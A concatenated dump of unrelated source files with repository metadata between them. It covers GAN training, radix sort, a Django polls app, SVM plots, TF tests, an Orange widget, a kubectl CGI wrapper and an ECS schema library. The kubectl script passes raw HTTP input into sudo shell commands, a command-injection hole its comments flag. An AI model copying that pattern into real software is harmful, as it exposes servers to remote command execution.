D_optimizer.load_state_dict(saved_model['D_optimizer_state_dict'])
start_iepoch = saved_model['iepoch']
start_ibatch = 1
return start_iepoch, start_ibatch
def main():
    """Full training loop: build data/models, optionally resume from
    opts.MODEL_PATH, then alternate G/D updates for opts.NUM_EPOCHS,
    periodically logging losses and saving sample images and checkpoints."""
    # Load the data
    data = GANstronomyDataset(opts.DATA_PATH, split=opts.TVT_SPLIT)
    data.set_split_index(0)
    data_loader = torch.utils.data.DataLoader(data,
                                              batch_size=opts.BATCH_SIZE,
                                              shuffle=True)
    num_classes = data.num_classes()
    # Make the output directory
    util.create_dir(opts.RUN_PATH)
    util.create_dir(opts.IMG_OUT_PATH)
    util.create_dir(opts.MODEL_OUT_PATH)
    # Copy opts.py and model.py to opts.RUN_PATH as a record
    shutil.copy2('opts.py', opts.RUN_PATH)
    shutil.copy2('model.py', opts.RUN_PATH)
    shutil.copy2('train.py', opts.RUN_PATH)
    # Instantiate the models
    G = Generator(opts.EMBED_SIZE, num_classes).to(opts.DEVICE)
    G_optimizer = torch.optim.Adam(G.parameters(), lr=opts.ADAM_LR, betas=opts.ADAM_B)
    D = Discriminator(num_classes).to(opts.DEVICE)
    D_optimizer = torch.optim.Adam(D.parameters(), lr=opts.ADAM_LR, betas=opts.ADAM_B)
    if opts.MODEL_PATH is None:
        start_iepoch, start_ibatch = 0, 0
    else:
        print('Attempting to resume training using model in %s...' % opts.MODEL_PATH)
        start_iepoch, start_ibatch = load_state_dicts(opts.MODEL_PATH, G, G_optimizer, D, D_optimizer)
    for iepoch in range(opts.NUM_EPOCHS):
        for ibatch, data_batch in enumerate(data_loader):
            # To try to resume training, just continue if iepoch and ibatch are less than their starts
            if iepoch < start_iepoch or (iepoch == start_iepoch and ibatch < start_ibatch):
                if iepoch % opts.INTV_PRINT_LOSS == 0 and not ibatch:
                    print('Skipping epoch %d...' % iepoch)
                continue
            recipe_ids, recipe_embs, img_ids, imgs, classes = data_batch
            # Make sure we're not training on validation or test data!
            if opts.SAFETY_MODE:
                for recipe_id in recipe_ids:
                    assert data.get_recipe_split_index(recipe_id) == 0
            batch_size, recipe_embs, imgs, classes, classes_one_hot = util.get_variables(recipe_ids, recipe_embs, img_ids, imgs, classes, num_classes)
            # Adversarial ground truths
            all_real = Variable(FloatTensor(batch_size, 1).fill_(1.0), requires_grad=False).to(opts.DEVICE)
            all_fake = Variable(FloatTensor(batch_size, 1).fill_(0.0), requires_grad=False).to(opts.DEVICE)
            # Train Generator
            for _ in range(opts.NUM_UPDATE_G):
                G_optimizer.zero_grad()
                imgs_gen = G(recipe_embs, classes_one_hot)
                fake_probs = D(imgs_gen, classes_one_hot)
                # G_loss = BCELoss(fake_probs, all_real)
                # NOTE(review): G is currently trained on pixel-space MSE only;
                # the adversarial BCE term above is commented out.
                G_loss = MSELoss(imgs_gen, imgs)
                G_loss.backward()
                G_optimizer.step()
            # Train Discriminator
            for _ in range(opts.NUM_UPDATE_D):
                D_optimizer.zero_grad()
                # detach() keeps discriminator gradients out of G.
                fake_probs = D(imgs_gen.detach(), classes_one_hot)
                real_probs = D(imgs, classes_one_hot)
                D_loss = (BCELoss(fake_probs, all_fake) + BCELoss(real_probs, all_real)) / 2
                D_loss.backward()
                D_optimizer.step()
            if iepoch % opts.INTV_PRINT_LOSS == 0 and not ibatch:
                print_loss(G_loss, D_loss, iepoch)
            if iepoch % opts.INTV_SAVE_IMG == 0 and not ibatch:
                # Save a training image
                get_img_gen(data, 0, G, iepoch, opts.IMG_OUT_PATH)
                # Save a validation image
                get_img_gen(data, 1, G, iepoch, opts.IMG_OUT_PATH)
            if iepoch % opts.INTV_SAVE_MODEL == 0 and not ibatch:
                print('Saving model...')
                save_model(G, G_optimizer, D, D_optimizer, iepoch, opts.MODEL_OUT_PATH)
    save_model(G, G_optimizer, D, D_optimizer, 'FINAL', opts.MODEL_OUT_PATH)
# Script entry point.
if __name__ == '__main__':
    main()
| [
"ShinyCode@users.noreply.github.com"
] | ShinyCode@users.noreply.github.com |
bc9e39931d2e0d04546e4d80bc1791a00f18341f | 4374b53176e1ba21034cea9d4723f3464cbf48a6 | /HW_2/Task_C.py | 4934525334765b4c4e52be6017862675be040e24 | [] | no_license | IVyazmin/MADE_algoritms | 8bbf479ee973806e4c9ab6b77f7ecbaa897a657d | a508411f9b7bd0799b3229d52dd7ae19773f312b | refs/heads/master | 2023-01-20T10:44:18.330420 | 2020-11-25T10:22:16 | 2020-11-25T10:22:16 | 295,223,566 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 767 | py | MAX_VALUE = ord('z') - ord('a') + 1
FIRST_VALUE = ord('a')  # alphabet base; MAX_VALUE above is the alphabet size
# First input line: n strings of length m; sort them by their last k columns.
row = input()
array = row.split(' ')
array = list(map(int, array))
n = array[0]
m = array[1]
k = array[2]
# Read the n strings.
array = []
for i in range(n):
    array.append(input())
# LSD radix sort: one stable counting-sort pass per character column, starting
# from the rightmost of the k significant columns.
for i in range(k):
    position = m - i - 1
    counters = [0] * MAX_VALUE
    new_array = [0] * n
    # Histogram of the letters appearing in this column.
    for j in range(n):
        element = array[j][position]
        counters[ord(element) - FIRST_VALUE] += 1
    # Prefix sums: first output slot for each letter.
    pos_counters = [0] * MAX_VALUE
    for j in range(1, MAX_VALUE):
        pos_counters[j] = pos_counters[j - 1] + counters[j - 1]
    # Stable scatter into the new order.
    for j in range(n):
        element = array[j][position]
        elem_pos = pos_counters[ord(element) - FIRST_VALUE]
        new_array[elem_pos] = array[j]
        pos_counters[ord(element) - FIRST_VALUE] += 1
    array = new_array
# Emit the reordered strings.
for i in range(n):
print(array[i]) | [
"ilja.vyazmin@mail.ru"
] | ilja.vyazmin@mail.ru |
b31d5ea47acb58030e554489eff1c84477515319 | 8d3af0e16bd34b30d87347eacc3defb553dd48d7 | /polls/models.py | a674a3057a1c1e583aa91e63368a7a7311e80013 | [] | no_license | Julie-the-Dragon/mysite | 6adb5ef055c5232c121f3c95bebbb05612c19342 | 8c639070ae9f8b021294817c1bbbb5f6e7192914 | refs/heads/master | 2021-05-10T14:30:47.792748 | 2018-01-22T21:52:25 | 2018-01-22T21:52:25 | 118,519,766 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 951 | py | import datetime
from django.db import models
from django.utils import timezone
class Question(models.Model):
    """A poll question with its publication date."""
    question_text = models.CharField(max_length=200)
    pub_date = models.DateTimeField('date published')
    def __str__(self):
        return self.question_text
    def was_published_recently(self):
        """True if pub_date falls within the last day and not in the future.

        Fix: the class previously defined this method twice; the first,
        simpler version (which also accepted future dates) was dead code
        shadowed by this one and has been removed.
        """
        now = timezone.now()
        return now - datetime.timedelta(days=1) <= self.pub_date <= now
    # Admin change-list presentation options for the method above.
    was_published_recently.admin_order_field = 'pub_date'
    was_published_recently.boolean = True
    was_published_recently.short_description = 'Published recently?'
class Choice(models.Model):
    """One selectable answer for a Question, with its vote tally."""
    question = models.ForeignKey(Question, on_delete=models.CASCADE)
    choice_text = models.CharField(max_length=200)
    votes = models.IntegerField(default=0)
    def __str__(self):
        return self.choice_text
| [
"MSpiridonov94@gmail.com"
] | MSpiridonov94@gmail.com |
ea803f5e3f823ec4e9212f1b9076cd4878c291a9 | 9f54779437e9852d6f83dd46cde17a7ef99922b8 | /python/akg/ops/poly_gpu/add.py | fe9f67a421be41f2cd4fdf7e3035e6631c16cf0c | [
"Apache-2.0",
"Zlib",
"BSD-3-Clause",
"MIT",
"LicenseRef-scancode-unknown-license-reference",
"Unlicense",
"BSD-2-Clause"
] | permissive | googol-lab/akg | e5424edbdae29aa2841c518edf9a62678581c499 | 4ad0f6a9c44742b54505bdedcd7e64d0ccf79e15 | refs/heads/master | 2023-02-09T20:48:58.770091 | 2021-01-05T09:31:38 | 2021-01-05T09:31:38 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 906 | py | # Copyright 2020 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""add"""
import akg
from akg.topi.cuda.injective_single_kernel import schedule_injective
from akg.ops.math_gpu import add
@akg.schedule(schedule_injective)
def add_manual(x, y):
    """Add with manual schedule.

    Elementwise x + y compiled with the hand-written injective GPU schedule.
    """
    return add.add(x, y)
def add_auto(x, y):
    """Add with auto poly.

    Elementwise x + y left to AKG's automatic polyhedral scheduling.
    """
    return add.add(x, y)
| [
"zhangrenwei1@huawei.com"
] | zhangrenwei1@huawei.com |
633981c5580abc6b32852ac0098516780d0c8861 | d9563f113fa4dcbf6dadb5ea186d69839f372119 | /pedidos/migrations/0004_auto_20191129_1821.py | 08c3d750eba80e0bc31f5b96aa8c4b9131fc203e | [] | no_license | CarlosSanz81/serv | 717eefea1ead9325472cef165f2326a14dd355cd | dd3cb5b022b8b939ff6ea502b8335c257d057abb | refs/heads/master | 2020-09-16T03:41:16.306550 | 2019-12-05T12:41:01 | 2019-12-05T12:41:01 | 223,640,310 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 406 | py | # Generated by Django 2.2.7 on 2019-11-29 17:21
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated by Django; alters Archivo.nombre to a FileField allowing
    # blank/null values. Avoid hand-editing beyond comments.
    dependencies = [
        ('pedidos', '0003_archivo'),
    ]
    operations = [
        migrations.AlterField(
            model_name='archivo',
            name='nombre',
            field=models.FileField(blank=True, null=True, upload_to='./media/'),
        ),
    ]
| [
"carlossanzgarcia81@gmail.com"
] | carlossanzgarcia81@gmail.com |
8a58c1f2b7cf7a7cc75e08c82d835d6ec656f348 | 58391be66d975a196a273cdfd3a7e315b5dcef41 | /train_and_test_svm.py | e6a2231e314567f6debc2bf682d9f79f17579f20 | [] | no_license | szbernat/train_svm | 7ffe3be1a20bd619ce243932637f73075f33a203 | b6325090f73b3d20443e3423c6f2f7e686676177 | refs/heads/main | 2023-01-31T20:28:48.207935 | 2020-12-02T14:49:36 | 2020-12-02T14:49:36 | 317,893,534 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,775 | py | #!/usr/bin/env python3
import csv
import random
import numpy as np
import matplotlib.pyplot as plt
from sklearn.model_selection import train_test_split
from sklearn.svm import SVC
from sklearn.metrics import accuracy_score
from itertools import combinations
def make_meshgrid(x, y, h=.02):
    """Return a dense coordinate grid (xx, yy) covering the ranges of x and
    y, padded by one unit on every side, with step h between grid points."""
    xs = np.arange(min(x) - 1, max(x) + 1, h)
    ys = np.arange(min(y) - 1, max(y) + 1, h)
    return np.meshgrid(xs, ys)
# Load the Iris data set: four numeric feature columns per row, then the
# integer class label in the last column.
data = []
target = []
header = []
with open("iris.csv", "r") as f:
    reader = csv.reader(f)
    header = next(reader)  # Skip data labels
    for row in reader:
        data.append(list(map(lambda x: float(x), row[:4])))
        target.append(int(row[4]))
svm_kernel = 'rbf'
# One subplot per unordered pair of the four features (6 pairs -> 2x3 grid).
comb = combinations(range(4), 2)
fig, axs = plt.subplots(2,3)
for c, ax in zip(comb, axs.flatten()):
    # Train/evaluate an SVM on just this feature pair.
    reduced_data = [[row[i] for i in c] for row in data]
    x_train,x_test,y_train,y_test = train_test_split(reduced_data, target, test_size=0.30, random_state=1997)
    svc = SVC(kernel=svm_kernel)
    svc.fit(x_train, y_train)
    y_pred = svc.predict(x_test)
    accuracy = accuracy_score(y_test, y_pred)*100
    # Create plot
    x = [row[0] for row in x_test]
    y = [row[1] for row in x_test]
    xx, yy = make_meshgrid(x,y)
    # Color the background by the predicted class over the whole grid.
    z = svc.predict(np.c_[xx.ravel(), yy.ravel()])
    z = z.reshape(xx.shape)
    ax.contourf(xx, yy, z, cmap=plt.cm.coolwarm, alpha=0.8)
    ax.scatter(x,y,c=y_test, cmap=plt.cm.coolwarm, s=20, edgecolors='k')
    ax.set_xlabel(header[c[0]])
    ax.set_ylabel(header[c[1]])
    ax.set_title(f"Accuracy = {accuracy:5.1f}%")
fig.suptitle(f"SVMs with {svm_kernel} kernel", fontsize=24)
# plt.show()
plt.tight_layout()
plt.savefig(f"{svm_kernel}.png")
| [
"szabobrnt@gmail.com"
] | szabobrnt@gmail.com |
ff7a93b1a6f90c184fbd023f55f0710ae8f08727 | e35ad4af5d578e152c6720e0bf41c12305b0dfdf | /code/project/utils/services.py | fd05543f8ba1363e002f596624bd150e99ffcb1f | [] | no_license | mcgill-a/dissertation | f860eb7d24df3239695d00e8b59cec685cc142df | 89eb1b12643133d32eb17c22537a13f7bbb764c7 | refs/heads/master | 2022-12-12T11:11:32.765319 | 2020-04-26T14:12:32 | 2020-04-26T14:12:32 | 215,106,639 | 0 | 0 | null | 2022-12-08T03:53:32 | 2019-10-14T17:35:20 | TeX | UTF-8 | Python | false | false | 104 | py | from datetime import datetime as dt
def timestamp():
return dt.now().strftime("%Y-%m-%d %H:%M:%S") | [
"40276245@live.napier.ac.uk"
] | 40276245@live.napier.ac.uk |
c92c8e96486ba05e3cf7c3d52836a06125a9a899 | 3d0ae7c8693463faa11bacad8e6ea9d0d70b9eb1 | /nlp/3rdParty/orange/orange/OrangeWidgets/Prototypes/OWPreprocessing.py | 168864c2174450afb47cb0f7ac89fb6b1324b927 | [] | no_license | stefie10/slu_hri | a76f79094bd1740676fec5d889411ba3b1d9dc26 | 50753379953e1ff822162eeab094cffe4a30f3e1 | refs/heads/master | 2022-12-14T01:07:51.522258 | 2020-08-31T00:50:12 | 2020-08-31T00:50:12 | 291,386,375 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,742 | py | """
<name>Preprocessing</name>
<description>Constructs data preprocessors.</description>
<icon>icons/FeatureConstructor.png</icon>
<priority>11</priority>
<contact>Janez Demsar (janez.demsar(@at@)fri.uni-lj.si)</contact>
"""
from OWWidget import *
import OWGUI, math, re
from orngWrap import Preprocessor
class OWPreprocessing(OWWidget):
    """Orange widget that emits a fresh Preprocessor instance plus the
    example table obtained by running it over the input data."""
    contextHandlers = {"": PerfectDomainContextHandler()}
    def __init__(self,parent=None, signalManager = None):
        OWWidget.__init__(self, parent, signalManager, "Preprocessing")
        # Input/output channel declarations consumed by the signal manager.
        self.inputs = [("Examples", ExampleTable, self.setData)]
        self.outputs = [("Preprocessor", Preprocessor), ("Examples", ExampleTable)]
        OWGUI.button(self.controlArea, self, "Apply", callback=self.apply)
        self.loadSettings()
        self.apply()  # initializes self.preprocessor and sends it downstream
        self.adjustSize()
    def setData(self, data):
        """Input-channel handler: remember the data and re-emit outputs."""
        self.data = data
        self.sendData()
    def sendData(self):
        """Send the (preprocessed, when possible) examples downstream."""
        if not self.data or not self.preprocessor:
            self.preprocessed = self.data
        else:
            self.preprocessed = self.preprocessor.processData(self.data)
        self.send("Examples", self.preprocessed)
    def apply(self):
        # The widget needs to construct a new instance of Preprocessor
        # If it modified and send the same instance every time, it would
        # modify an instance which has been passed to another widget which
        # might have a disabled connection and should not get any modifications
        # (and would even not get notified about the preprocessor having been changed)
        self.preprocessor = Preprocessor()
        self.send("Preprocessor", self.preprocessor)
| [
"stefie10@alum.mit.edu"
] | stefie10@alum.mit.edu |
63fc33ebf5a416adf5ad443484da0991e3e0de86 | 5373d5c41d6850492c294fc5bb52eede898d0181 | /find_length_of_loop.py | 0b70db472a9dd42a1430404bc3ed612f27c70728 | [] | no_license | agvaibhav/linked-list | 4dc2e79e9f84b955ec7e519c13679f1f802e7c25 | c561d671c6257c41fad9a38e38143ac4280948ad | refs/heads/master | 2020-03-26T10:31:07.540276 | 2019-08-09T09:39:26 | 2019-08-09T09:39:26 | 144,801,744 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 471 | py | def countNodesinLoop(head):
#Your code here
temp = head
slow = temp.next
fast = temp.next.next
for i in range(500):
if temp.next is None:
break
temp = temp.next
if temp.next is None:
return 0
while slow != fast:
slow = slow.next
fast = fast.next.next
count = 1
slow = slow.next
while slow != fast:
count += 1
slow = slow.next
return count
| [
"noreply@github.com"
] | agvaibhav.noreply@github.com |
53e5f61af1f380bd9bd675436d443b5109b3d873 | 67b8ff4f52b4f09982e46516961240942370bb37 | /tests/garage/tf/misc/test_tensor_utils.py | 5a4e5b511fe6db0c9da2b31623fef61ddf3e7a4a | [
"MIT"
] | permissive | lywong92/garage | daee8f373301c43c3e4530b7642a22900ef80cd1 | 96cb8887fcae90531a645d540653010e7fe10fcc | refs/heads/master | 2020-06-12T02:33:23.871320 | 2019-06-27T20:09:53 | 2019-06-27T20:58:59 | 194,169,356 | 1 | 0 | MIT | 2019-06-27T22:09:46 | 2019-06-27T22:09:46 | null | UTF-8 | Python | false | false | 2,227 | py | """
This script creates a test that tests functions in garage.tf.misc.tensor_utils.
"""
import numpy as np
import tensorflow as tf
from garage.tf.misc.tensor_utils import compute_advantages
from garage.tf.misc.tensor_utils import get_target_ops
from tests.fixtures import TfGraphTestCase
class TestTensorUtil(TfGraphTestCase):
    """Graph-mode (TF1) tests for garage.tf.misc.tensor_utils helpers."""
    def test_compute_advantages(self):
        """Tests compute_advantages function in utils."""
        # Degenerate settings: no discounting, no GAE decay, length-1 paths,
        # so the advantage reduces to reward minus baseline.
        discount = 1
        gae_lambda = 1
        max_len = 1
        rewards = tf.placeholder(
            dtype=tf.float32, name='reward', shape=[None, None])
        baselines = tf.placeholder(
            dtype=tf.float32, name='baseline', shape=[None, None])
        adv = compute_advantages(discount, gae_lambda, max_len, baselines,
                                 rewards)
        # Set up inputs and outputs
        rewards_val = np.ones(shape=[2, 1])
        baselines_val = np.zeros(shape=[2, 1])
        desired_val = np.array([1., 1.])
        adv = self.sess.run(
            adv, feed_dict={
                rewards: rewards_val,
                baselines: baselines_val,
            })
        assert np.array_equal(adv, desired_val)
    def test_get_target_ops(self):
        """Without tau, the update ops copy source values into the targets."""
        var = tf.get_variable(
            'var', [1], initializer=tf.constant_initializer(1))
        target_var = tf.get_variable(
            'target_var', [1], initializer=tf.constant_initializer(2))
        self.sess.run(tf.global_variables_initializer())
        assert target_var.eval() == 2
        update_ops = get_target_ops([var], [target_var])
        self.sess.run(update_ops)
        assert target_var.eval() == 1
    def test_get_target_ops_tau(self):
        """With tau, updates interpolate; the init ops still copy outright."""
        var = tf.get_variable(
            'var', [1], initializer=tf.constant_initializer(1))
        target_var = tf.get_variable(
            'target_var', [1], initializer=tf.constant_initializer(2))
        self.sess.run(tf.global_variables_initializer())
        assert target_var.eval() == 2
        init_ops, update_ops = get_target_ops([var], [target_var], tau=0.2)
        self.sess.run(update_ops)
        # 0.2 * 1 + 0.8 * 2 = 1.8
        assert np.allclose(target_var.eval(), 1.8)
        self.sess.run(init_ops)
        assert np.allclose(target_var.eval(), 1)
| [
"noreply@github.com"
] | lywong92.noreply@github.com |
7e170929558b7027c5f971790f56a2df4f97320e | 8e6c4def374ba21c934f6856c0333a1e8bff69db | /190520/Quiz02.py | 12854d9e9a693c1f970e9157d15f2d9c6002d74a | [] | no_license | inuse918/Python_Practice_2 | d5a930a95b51181330abc6601d80f71b67780740 | de4dd6ec8d96e9d259566916b9e7f08402e7917d | refs/heads/master | 2020-05-06T13:20:08.153295 | 2019-12-25T23:07:47 | 2019-12-25T23:07:47 | 180,128,504 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 142 | py | def sum(x,y):
return x+y
user1=int(input("첫 번째 정수: "))
user2=int(input("두 번째 정수: "))
print("합은",sum(user1,user2)) | [
"s2018s34@e-mirim.hs.kr"
] | s2018s34@e-mirim.hs.kr |
b7f17fe614504cdf44e7f4deb2041839a257fb40 | 2021a5988ef3d2d050b3614ccd5864872045cadb | /kube.py | b8b8a488c69afeb045bee69aa7b06129ce46d417 | [] | no_license | khushbooagrawal245/DevOps-Integeration-Portal | ac48221aae16f68611362d877828eb01e5f101dd | d9a7e19548a40481ffadd61ff62975741868818a | refs/heads/main | 2023-06-10T16:52:42.564801 | 2021-07-03T09:37:09 | 2021-07-03T09:37:09 | 382,575,832 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,875 | py | #!/usr/bin/python3
# Minimal CGI wrapper around kubectl: dispatches on the numeric opcode that is
# the first whitespace-separated token of the "x" query parameter.
#
# SECURITY NOTE(review): every branch below interpolates raw, untrusted HTTP
# input straight into a shell command executed via sp.getoutput -- a classic
# command-injection hole (e.g. x="3 foo;rm -rf /"). This should be rewritten
# around subprocess.run([...], shell=False) with an argument list.
print("content-type:text/html")
print()
import cgi
import subprocess as sp
f = cgi.FieldStorage()
cmd = f.getvalue("x")
# NOTE(review): f.getvalue("x") is None when the parameter is absent, which
# makes the split() below raise AttributeError.
val = cmd.split()
#Creating deployment
if val[0]=="1":
    dname = val[2]
    iname = val[1]
    o=sp.getoutput("sudo kubectl create deployment {} --image={} --kubeconfig /root/admin.conf".format(dname,iname))
    print(o)
#Creating pod
elif val[0]=="2":
    pname = val[2]
    iname = val[1]
    o=sp.getoutput("sudo kubectl run {} --image={} --kubeconfig /root/admin.conf".format(pname,iname))
    print(o)
#Delete pod
elif val[0]=="3":
    pname = val[1]
    o=sp.getoutput("sudo kubectl delete pod {} --kubeconfig /root/admin.conf".format(pname))
    print(o)
#delete deployment
elif val[0]=="4":
    dname = val[1]
    o=sp.getoutput("sudo kubectl delete deployment {} --kubeconfig /root/admin.conf".format(dname))
    print(o)
#expose deployment
elif val[0]=="5":
    dname = val[1]
    port_no = val[2]
    etype = val[3]
    o=sp.getoutput("sudo kubectl expose deployment {} --type={} --port={} --kubeconfig /root/admin.conf".format(dname,etype,port_no))
    print(o)
#scale deployment
elif val[0]=="6":
    dname = val[1]
    replica= val[2]
    o=sp.getoutput("sudo kubectl scale deployment {} --replicas={} --kubeconfig /root/admin.conf".format(dname,replica))
    print(o)
#list pods
elif val[0]=="7":
    o=sp.getoutput("sudo kubectl get pods --kubeconfig /root/admin.conf")
    print(o)
#list deployments
elif val[0]=="8":
    o=sp.getoutput("sudo kubectl get deployments --kubeconfig /root/admin.conf")
    print(o)
#list services
elif val[0]=="9":
    o=sp.getoutput("sudo kubectl get svc --kubeconfig /root/admin.conf")
    print(o)
#thank you note
elif val[0]=="10":
    print("I'm happy to help")
#error
else:
    # NOTE(review): this comparison is a no-op statement; the fall-through to
    # the error message below is what actually handles unknown opcodes.
    val[0]=="404"
print("Something went wrong...") | [
"noreply@github.com"
] | khushbooagrawal245.noreply@github.com |
c51081a1c6b74ebb8d098b6d0ea54463cde817ce | 80bb15e7ce4c7726003ade301cb311b57b75be9c | /src/text_avg_tfidf_main.py | 461bcfe2148bc4c5039bca7b4bc65135303a2504 | [] | no_license | shiyunchen/DeepTextClassifier | ba4f55a0eed321491e91cfe2d56bf78fd1333852 | 210b055d4dca2c7bc731bd3bd4bea12f85ebf576 | refs/heads/master | 2020-05-20T15:07:45.321826 | 2019-05-08T15:52:18 | 2019-05-08T15:52:18 | 185,636,183 | 0 | 0 | null | 2019-05-08T15:45:32 | 2019-05-08T15:45:32 | null | UTF-8 | Python | false | false | 1,234 | py | # coding: utf-8
from __future__ import print_function
from __future__ import division
import tensorflow as tf
import numpy as np
from text_avg_tfidf import Model
from dataset import DataSetIDF as DataSet
from config import ConfigAvgTFIDF as Config
import tools
# Module-level pipeline state: config, dataset, model and a live TF session
# are all created at import time (import has side effects).
my_config = Config()
my_data = DataSet(my_config, True)
my_config.we = my_data.we  # presumably pretrained word embeddings; confirm in DataSet
my_model = Model(my_config)
init = tf.global_variables_initializer()
sess = tf.Session()
sess.run(init)
def train():
    """Train on the train split while evaluating on the test split, writing
    TF summaries and checkpoints under my_config.log_dir."""
    summary_writer = tf.summary.FileWriter(my_config.log_dir, sess.graph)
    my_model.train_dev_test(sess, [my_data.train_x, my_data.train_y, my_data.train_seq_len, my_data.train_tfidf],
                            test_xy=[my_data.test_x, my_data.test_y, my_data.test_seq_len, my_data.test_tfidf],
                            save_model=True,
                            summary_writer=summary_writer)
def get_repr():
    """Export the train-split sample representations produced by the model,
    together with the train labels, to <log_dir>/samples_vector.pkl."""
    vectors = np.array(my_model.get_represent(sess, [my_data.train_x, my_data.train_y, my_data.train_seq_len]))
    print("samples_vector: {}".format(vectors.shape))
    tools.save_params([vectors, my_data.train_y], my_config.log_dir+"/samples_vector.pkl")
# Entry point: runs training by default; switch to get_repr() to dump features.
if __name__ == '__main__':
    train()
    # get_repr()
| [
"myqway@outlook.com"
] | myqway@outlook.com |
1f88d1a8bf3f6b3695ad54b42360ae9375e218c6 | 0bcc028259d40a6a33f41072ab9e7076603519e8 | /Learning_Languages/Learning_Python/area.py | a48d8f6b95e03437c89cbea28704e43aaf925e5b | [] | no_license | ravzac14/Skill_Buildin | f0700b8c6203e5806bdba2892a318a025ea5828a | e473116969df126bcae8c347b26e829513cb83f0 | refs/heads/master | 2021-01-22T03:25:52.400521 | 2015-07-06T20:25:32 | 2015-07-06T20:25:32 | 25,415,795 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 83 | py | import math
print "Radius is 6"
r = 6
A = 0
A = math.pi*(r**2)
print "Area is " A
| [
"raver_zack@yahoo.com"
] | raver_zack@yahoo.com |
75f070a45d6c3ae4c2844bb87300d5d1bf8efc9e | 3925e9e9fdd9f65c0095cd9db2ad7c1298fa1e36 | /src/ecs/ecs.py | 81e57e6776a7101ae5906d7fe0ce295c860ce21f | [] | no_license | dtact/ecs | 343f156f518c28b5e171e13febfe3b995dd8274a | 56f1e327a6380ab7f48baae9005bf1503466ff5e | refs/heads/master | 2023-06-12T03:07:01.319105 | 2021-06-23T20:42:17 | 2021-06-23T20:42:17 | 367,652,359 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,812 | py | # noqa: D101,D100,D102
import json
import dateutil.parser
from datetime import datetime
class Int(int):
    """ECS numeric field wrapper: constructing it from None yields None, so
    absent values silently produce no field instead of raising."""

    def __new__(cls, val):
        return None if val is None else super().__new__(cls, val)
class String(str):
    """ECS string field wrapper: constructing it from None yields None, so
    absent values silently produce no field instead of raising."""

    def __new__(cls, val):
        return None if val is None else super().__new__(cls, val)
class Bytes(Int):
    """Byte-counter field (used e.g. as source.bytes via Source._allowed)."""
    pass
class Timestamp(str):
    """ECS timestamp normalized to ISO-8601 text with a trailing "Z" for
    UTC. Accepts an ISO string, a Unix-epoch number, or a datetime-like
    object exposing isoformat(); None yields None."""

    def __new__(cls, val):
        if val is None:
            return
        if isinstance(val, str):
            # Re-parse so every string ends up in the canonical ISO form.
            parsed = dateutil.parser.isoparse(val)
            text = parsed.isoformat("T").replace("+00:00", "Z")
        elif isinstance(val, (float, int)):
            # Epoch seconds -> local datetime -> ISO text.
            text = datetime.fromtimestamp(val).isoformat("T").replace("+00:00", "Z")
        else:
            # Assume a datetime-like object.
            text = val.isoformat("T").replace("+00:00", "Z")
        return super().__new__(cls, text)
class Duration(Int):
    """Duration field (registered as event.duration in Event._allowed)."""
    pass
class Path(String):
    """URL path component (registered as url.path in URL._allowed)."""
    pass
class Query(String):
    def __new__(cls, val):
        """Build a url.query value from a raw string, or from a mapping that
        is url-encoded first; an empty dict or None yields None."""
        if val is None:
            return
        if type(val) is str:
            return super().__new__(cls, val)
        if type(val) is dict:
            if not val:
                return
            from urllib.parse import urlencode
            return super().__new__(cls, urlencode(val))
        raise Exception("Unsupported type for query")
# Thin String wrappers naming individual ECS fields (event.*, error.*,
# user.*); Base files each value under the key mapped to its class.
class Provider(String):
    pass
class Action(String):
    pass
class Message(String):
    pass
class Code(String):
    pass
class Id(String):
    pass
class Name(String):
    pass
class Dataset(String):
    pass
class Outcome(String):
    pass
class Kind(String):
    pass
class Type(list):
    """event.type value: accepts a list, or a single string that is wrapped
    into a one-element list; anything else is rejected."""

    def __init__(self, val):
        if isinstance(val, str):
            super().__init__([val])
        elif isinstance(val, list):
            super().__init__(val)
        else:
            raise Exception("Expected list for type, got: ", val)
class Group(list):
    # Same contract as Type: a bare string is wrapped into a one-element list.
    def __init__(self, val):
        if isinstance(val, list):
            super().__init__(val)
        elif isinstance(val, str):
            super().__init__([val])
        else:
            raise Exception("Expected list for group, got: ", val)
class Category(list):
    # Same contract as Type and Group.
    def __init__(self, val):
        if isinstance(val, list):
            super().__init__(val)
        elif isinstance(val, str):
            super().__init__([val])
        else:
            raise Exception("Expected list for category, got: ", val)
class Port(Int):
    """Network port number field."""
    pass
class Packets(Int):
    """Packet-counter field."""
    pass
class MAC(String):
    """MAC address field."""
    pass
class Address(String):
    """Network address: an IP literal or a host/domain name (Source derives
    ip/domain from it)."""
    pass
class Base(dict):
    """Common machinery for ECS sub-documents: each positional argument is
    filed under the key(s) whose registered class (in ``_allowed``) exactly
    matches the argument's type. None and empty-dict arguments are ignored;
    anything unrecognized raises."""

    def __init__(self, *args):
        fields = {}
        for arg in args:
            if arg is None or arg == {}:
                continue
            matched = False
            for (key, typ) in self._allowed.items():
                if type(arg) is typ:
                    matched = True
                    fields[key] = arg
            if not matched:
                raise Exception(
                    f"Type {type(arg)} not supported for {type(self)}, allowed are: {self._allowed}"
                )
        super().__init__(fields)
class Original(String):
    """Verbatim original value (event.original, url.original, ...)."""
    pass
class User(Base):
    # Accepts Name and Id values; the "target" entry is appended below once
    # the Target class exists.
    _allowed = {"name": Name, "id": Id}
class Target(User):
    """Nested user sub-document stored under the "target" key of User."""
    pass
# Target can only be registered after its class statement has executed.
User._allowed.update({"target": Target})
class Error(Base):
    _allowed = {"code": Code, "id": Id, "message": Message}
class Event(Base):
    "Meta-information specific to ECS."
    _allowed = {
        "original": Original,
        "provider": Provider,
        "action": Action,
        "id": Id,
        "category": Category,
